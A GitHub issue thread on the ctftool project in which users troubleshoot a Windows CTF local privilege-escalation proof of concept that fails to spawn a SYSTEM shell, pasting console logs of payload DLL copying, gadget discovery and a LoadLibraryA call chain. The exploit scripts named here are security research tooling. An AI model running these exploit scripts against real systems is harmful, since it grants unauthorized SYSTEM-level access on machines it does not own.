taviso / ctftool

Interactive CTF Exploration Tool
Apache License 2.0

cmd not spawned in win 10 1803 #16

Open J1nchur1k1 opened 5 years ago

J1nchur1k1 commented 5 years ago

All is going well, just the cmd is not getting spawned on the locked screen.

Below are the artifacts for the same.

ctf> script scripts\ctf-logonui-system.ctf
Attempting to copy exploit payload...
C:payload64.dll
1 File(s) copied

The screen will lock to trigger the login screen in 5 seconds...
Closing existing ALPC Port Handle 0000023C...
The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon1
Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon1, Handle 0000023C
Client 0, Tid 5792 (Flags 0000, Hwnd 000016A0, Pid 3032, ctftool.exe)
Client 1, Tid 9196 (Flags 0x1000000c, Hwnd 000023EC, Pid 3044, LogonUI.exe)
Found new client LogonUI.exe, DefaultThread now 9196
ReleaseId is 1803
Guessed msvcrt => C:\WINDOWS\system32\msvcrt.DLL
Found Gadget 48895C... in module msvcrt at offset 0x30c20
C:\WINDOWS\system32\msvcrt.DLL->.text->VirtualAddress is 0x001000
C:\WINDOWS\system32\msvcrt.DLL->.text->PointerToRawData is 0x000400
C:\WINDOWS\system32\kernel32.DLL->.data->VirtualAddress is 0x0a8000
Command succeeded, stub created
Dumping Marshal Parameter 3 (Base 01429368, Type 0x106, Size 0x18, Offset 0x40)
000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c  M..q(....*..[.C\
000010: 01 00 00 00 43 c4 1f 00                          ....C...
Marshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x1fc443
0x7ffdf3270000
0x7ffdf3a30000
0x7ffdf38b0000
Guessed msctf => C:\WINDOWS\system32\msctf.DLL
Found Gadget 488b41... in module msctf at offset 0xc3550
C:\WINDOWS\system32\msctf.DLL->.text->VirtualAddress is 0x001000
C:\WINDOWS\system32\msctf.DLL->.text->PointerToRawData is 0x000400
0x7ffdf3a30000
Guessed kernel32 => C:\WINDOWS\system32\kernel32.DLL
C:\WINDOWS\system32\kernel32.DLL is a 64bit module.
kernel32!LoadLibraryA@0x180000000+0x1e090
The CFG call chain is built, writing in parameters...
Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
0x7ffdf33d0000
Guessed combase => C:\WINDOWS\system32\combase.DLL
Found Gadget 488b49... in module combase at offset 0x1d9270
C:\WINDOWS\system32\combase.DLL->.text->VirtualAddress is 0x001000
C:\WINDOWS\system32\combase.DLL->.text->PointerToRawData is 0x000400
Payload created and call chain ready, get ready...

Exploit complete.

MrKcyre commented 5 years ago

Same here, I tried at my company test computers, 1903 and 1803 without the August patch, and cmd did not spawn.. 🤔 I'm wondering what's the issue

taviso commented 5 years ago

Can you try the scripts\ctf-consent-system.ctf script instead?

J1nchur1k1 commented 5 years ago

Sure taviso, will give you output about the same.

J1nchur1k1 commented 5 years ago

I have tested with it.... it spawned me a cmd, but as soon as I did whoami, it gave me the same user, rather than NT-authority.

ctf> script scripts\ctf-consent-system.ctf
Attempting to copy exploit payload...
C:payload64.dll
1 File(s) copied

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!! YOU DONT NEED TO KNOW ANY PASSWORD, JUST WAIT! !!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

PromptOnSecureDesktop is 0
Closing existing ALPC Port Handle 00000234...
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1
Connected to CTF server@\BaseNamedObjects\msctf.serverDefault1, Handle 000002D4
Waiting for the consent dialog to join the session...